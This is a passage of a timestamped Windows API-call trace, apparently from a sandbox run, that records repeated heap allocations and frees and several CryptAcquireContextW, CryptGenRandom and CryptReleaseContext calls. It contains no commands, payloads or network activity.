(hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eaf60 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d18 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb078 [0033.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.263] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.263] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9eb0 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.264] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.264] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.265] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.265] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb190 | out: hHeap=0x2b0000) returned 1 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eae48 | out: hHeap=0x2b0000) returned 1 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecd18 | out: hHeap=0x2b0000) returned 1 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ead30 | out: hHeap=0x2b0000) returned 1 [0033.266] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2bef88 | out: hHeap=0x2b0000) returned 1 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9eb0 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9e20 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d90 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9d00 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9c70 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9be0 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9b50 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9ac0 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9a30 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e99a0 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9910 [0033.266] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9880 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e97f0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9760 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e96d0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8c20 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8cb0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8d40 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8dd0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8e60 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8ef0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e8f80 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9010 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e90a0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9130 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e91c0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9250 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e92e0 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9370 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9400 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9490 [0033.267] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9eb0 | out: hHeap=0x2b0000) returned 1 [0033.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9e20 | out: hHeap=0x2b0000) returned 1 [0033.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d90 | out: hHeap=0x2b0000) returned 1 [0033.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9d00 | out: hHeap=0x2b0000) returned 1 [0033.270] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9c70 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9be0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9b50 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9ac0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9a30 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e99a0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9910 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9880 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e97f0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9760 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e96d0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8c20 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8cb0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8d40 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8dd0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8e60 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8ef0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e8f80 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9010 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e90a0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9130 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e91c0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9250 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e92e0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9370 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9400 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9490 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e95b0 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eaf60 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac08 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eac90 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9640 | out: hHeap=0x2b0000) returned 1 [0033.271] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb078 | out: hHeap=0x2b0000) returned 1 [0033.271] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.272] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.272] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.272] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.273] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.273] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.273] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.274] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.274] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.274] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.275] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.275] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.320] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.321] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.321] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.321] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.322] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.322] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.322] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.322] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.323] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.323] CryptAcquireContextW (in: phProv=0x2ad7f4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad7f4*=0x2eac08) returned 1 [0033.323] CryptGenRandom (in: hProv=0x2eac08, dwLen=0x80, pbBuffer=0x2ad808 | out: pbBuffer=0x2ad808) returned 1 [0033.323] CryptReleaseContext (hProv=0x2eac08, dwFlags=0x0) returned 1 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac08 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2eac90 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.324] CryptAcquireContextW (in: phProv=0x2ad724, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ad724*=0x2e6c80) returned 1 [0033.324] CryptGenRandom (in: hProv=0x2e6c80, dwLen=0x80, pbBuffer=0x2ad738 | out: pbBuffer=0x2ad738) returned 1 [0033.324] CryptReleaseContext (hProv=0x2e6c80, dwFlags=0x0) returned 1 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9640 [0033.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e95b0 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x108) returned 0x2eb078 [0033.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4) returned 0x2e7d08 [0033.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eaf60 [0033.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2ead30 [0033.325] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2e6bf8 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x10c) returned 0x2ecd18 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d08 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2bef88 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x84) returned 0x2e9520 [0033.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e6bf8 | out: hHeap=0x2b0000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eae48 [0033.326] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: hHeap=0x2b0000) returned 1 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8) returned 0x2e7d18 [0033.326] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xc) returned 0x2befa0 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d08 | out: hHeap=0x2b0000) returned 1 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7d18 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x88) returned 0x2e9520 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2befa0 | out: hHeap=0x2b0000) returned 1 [0033.327] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x2eb190 [0033.327] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e9520 | out: 